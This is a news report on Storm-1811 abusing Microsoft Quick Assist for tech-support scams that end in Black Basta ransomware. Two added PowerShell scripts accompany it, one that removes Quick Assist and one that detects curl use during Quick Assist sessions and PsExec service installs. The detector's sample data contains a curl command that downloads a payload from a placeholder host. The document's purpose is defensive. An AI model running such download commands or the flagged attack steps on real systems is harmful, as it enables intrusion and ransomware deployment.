Crims abusing Microsoft Quick Assist to deploy Black Basta ransomware

Spoiler alert: it's not really IT support controlling your device


A cybercrime gang has been abusing Microsoft's Quick Assist application in social engineering attacks that ultimately allow the crew to infect victims with Black Basta ransomware.

This, according to Redmond, which said the campaign has been ongoing since mid-April, and blamed a financially motivated group it tracks as Storm-1811 for the intrusions.

Microsoft did not immediately respond to The Register's questions about the attack, including how many customers have been hit. We will update this story when we receive a response.

Quick Assist is a software tool installed by default in Windows 11 that allows someone to share their PC or macOS device with a remote user, typically in corporate IT, who can then control the computer remotely. This also makes it easier for scammers, posing as tech support, to trick people into giving them full access to the targeted device.

"Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams," the Windows giant said in a Wednesday alert.

Additionally, organizations can block or uninstall Quick Assist and other remote management tools if they aren't using them, which will help reduce their risk of these types of social engineering attacks, Microsoft advised.
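One way to carry out that advice on a single endpoint, as an added PowerShell example that is not from the article or from Microsoft: remove the Store-delivered Quick Assist package (the package name MicrosoftCorporationII.QuickAssist is an assumption), the provisioned copy that would reinstall it for new profiles, and the older Windows capability, then check that nothing is left.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the article or from Microsoft. Removes Quick Assist
# from a Windows 10/11 endpoint that does not use it. Two delivery channels
# are covered: the Store (Appx) package, assumed to be named
# MicrosoftCorporationII.QuickAssist, and the older Windows capability,
# matched with the wildcard App.Support.QuickAssist*.

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    # 1. Store-delivered package, for every user profile on the machine
    foreach ($pkg in @(Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist')) {
        if ($PSCmdlet.ShouldProcess($pkg.PackageFullName, 'Remove-AppxPackage -AllUsers')) {
            Remove-AppxPackage -Package $pkg.PackageFullName -AllUsers
        }
    }

    # 2. Provisioned copy, so newly created user profiles do not get it back
    $prov = Get-AppxProvisionedPackage -Online |
        Where-Object { $_.DisplayName -eq 'MicrosoftCorporationII.QuickAssist' }
    foreach ($p in @($prov)) {
        if ($PSCmdlet.ShouldProcess($p.PackageName, 'Remove-AppxProvisionedPackage -Online')) {
            Remove-AppxProvisionedPackage -Online -PackageName $p.PackageName | Out-Null
        }
    }

    # 3. Legacy capability (Windows 10 and early Windows 11 builds)
    $caps = Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }
    foreach ($cap in @($caps)) {
        if ($PSCmdlet.ShouldProcess($cap.Name, 'Remove-WindowsCapability -Online')) {
            Remove-WindowsCapability -Online -Name $cap.Name | Out-Null
        }
    }
}

# Returns $true if any Quick Assist delivery is still present. Use it after
# removal and as a periodic compliance check.
function Test-QuickAssistPresent {
    $appx = @(Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist').Count -gt 0
    $cap  = @(Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' }).Count -gt 0
    return ($appx -or $cap)
}

# Preview the changes first, then apply them and verify
Remove-QuickAssist -WhatIf
Remove-QuickAssist
Test-QuickAssistPresent
```

Removal on one machine is the easy part; the Store can bring the app back through updates, so in a managed fleet this is normally paired with an application-control or Store policy, and the same inventory logic applies to any other remote-access tool the organisation does not sanction.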

Plus, there's a whole list of indicators of compromise, and threat-hunting queries that Microsoft customers can use to look for malicious activity on their networks, such as suspicious curl behavior or possible malicious use of proxy or tunneling tools.

The break-ins begin with Storm-1811 impersonating IT support through voice phishing, and convincing the user to give them access to the computer through Quick Assist. In some cases users are bombarded with spam emails and then contacted asking if they want help fixing the problem.

Access is granted via a keyboard shortcut that launches Quick Assist, and a security code provided by the attacker. After the target enters the security code, they can then share their screen with the attacker, who can select "Request Control." If the target approves this request, the fraudster now has full control of the device.

After this pwnage, Storm-1811 gets to work delivering malicious payloads and remote monitoring and management (RMM) software, we're told.

"In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike," the threat intel team noted.

This persistent access to the compromised device allows the attackers to move laterally through the victim's environment. "Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network," according to Microsoft. ®
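The hunting queries mentioned earlier (suspicious curl activity) and the PsExec deployment step described here both lend themselves to simple log triage. The following is an added PowerShell example, not from the article and not one of Microsoft's published queries, that runs two heuristics over process-creation and service-install records: a curl.exe launch on a host where a Quick Assist session (process name QuickAssist.exe) started within the preceding hour, and installation of a service named PSEXESVC, which is what PsExec creates on a remote target. The sample records, the 60-minute window and the field names are all constructed assumptions; map them to your own telemetry.

```powershell
# Added example, not from the article or from Microsoft. Triage filter over
# endpoint telemetry for two patterns the article describes. Field names
# (Time, Host, EventType, Image, CommandLine, ServiceName, ImagePath) are
# assumed; adapt them to your own log schema.

function Find-QuickAssistAbuseIndicators {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 60   # assumed correlation window, tune locally
    )

    $hits = New-Object System.Collections.Generic.List[object]

    foreach ($hostGroup in ($Events | Group-Object Host)) {
        $hostEvents = $hostGroup.Group | Sort-Object Time

        # Quick Assist gives the helper the user's own interactive session, so
        # commands it runs are children of explorer/cmd, not of QuickAssist.exe.
        # Correlate by time instead: collect session starts on this host.
        $sessionStarts = @($hostEvents |
            Where-Object { $_.EventType -eq 'ProcessCreate' -and $_.Image -match '(?i)\\QuickAssist\.exe$' } |
            ForEach-Object { $_.Time })

        foreach ($e in $hostEvents) {
            if ($e.EventType -eq 'ProcessCreate' -and $e.Image -match '(?i)\\curl\.exe$') {
                # curl.exe shortly after a Quick Assist session began on the same host
                $recent = @($sessionStarts |
                    Where-Object { $_ -le $e.Time -and ($e.Time - $_).TotalMinutes -le $WindowMinutes })
                if ($recent.Count -gt 0) {
                    $hits.Add([pscustomobject]@{
                        Time   = $e.Time
                        Host   = $e.Host
                        Rule   = 'CurlDuringQuickAssistSession'
                        Detail = $e.CommandLine
                    })
                }
            }
            elseif ($e.EventType -eq 'ServiceInstall' -and $e.ServiceName -match '(?i)^PSEXESVC') {
                # PsExec installs its helper service on the remote host before running a command
                $hits.Add([pscustomobject]@{
                    Time   = $e.Time
                    Host   = $e.Host
                    Rule   = 'PsExecServiceInstall'
                    Detail = "$($e.ServiceName) -> $($e.ImagePath)"
                })
            }
        }
    }
    return $hits
}

# Constructed sample records (not real telemetry). WS01 shows a Quick Assist
# session followed by a curl download and later a PsExec service install;
# WS02 shows a curl run with no Quick Assist session, which is not flagged.
$sampleEvents = @(
    [pscustomobject]@{ Time=[datetime]'2024-05-15T10:00:00'; Host='WS01'; EventType='ProcessCreate'; Image='C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_x\QuickAssist.exe'; CommandLine='QuickAssist.exe' }
    [pscustomobject]@{ Time=[datetime]'2024-05-15T10:07:00'; Host='WS01'; EventType='ProcessCreate'; Image='C:\Windows\System32\curl.exe'; CommandLine='curl.exe -o C:\Users\Public\update.zip http://example.invalid/update.zip' }
    [pscustomobject]@{ Time=[datetime]'2024-05-15T14:00:00'; Host='WS02'; EventType='ProcessCreate'; Image='C:\Windows\System32\curl.exe'; CommandLine='curl.exe https://example.invalid/health' }
    [pscustomobject]@{ Time=[datetime]'2024-05-15T11:30:00'; Host='WS01'; EventType='ServiceInstall'; ServiceName='PSEXESVC'; ImagePath='%SystemRoot%\PSEXESVC.exe' }
)

Find-QuickAssistAbuseIndicators -Events $sampleEvents | Format-Table -AutoSize
```

The first rule is deliberately a correlation rather than a parent-process match, because the whole point of the technique is that the attacker's commands run as the legitimate user; in practice you would feed it Sysmon event 1 or Security 4688 records for process creation and System event 7045 for service installs, and add the RMM tools named in the article (ScreenConnect, NetSupport Manager) to the process list.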
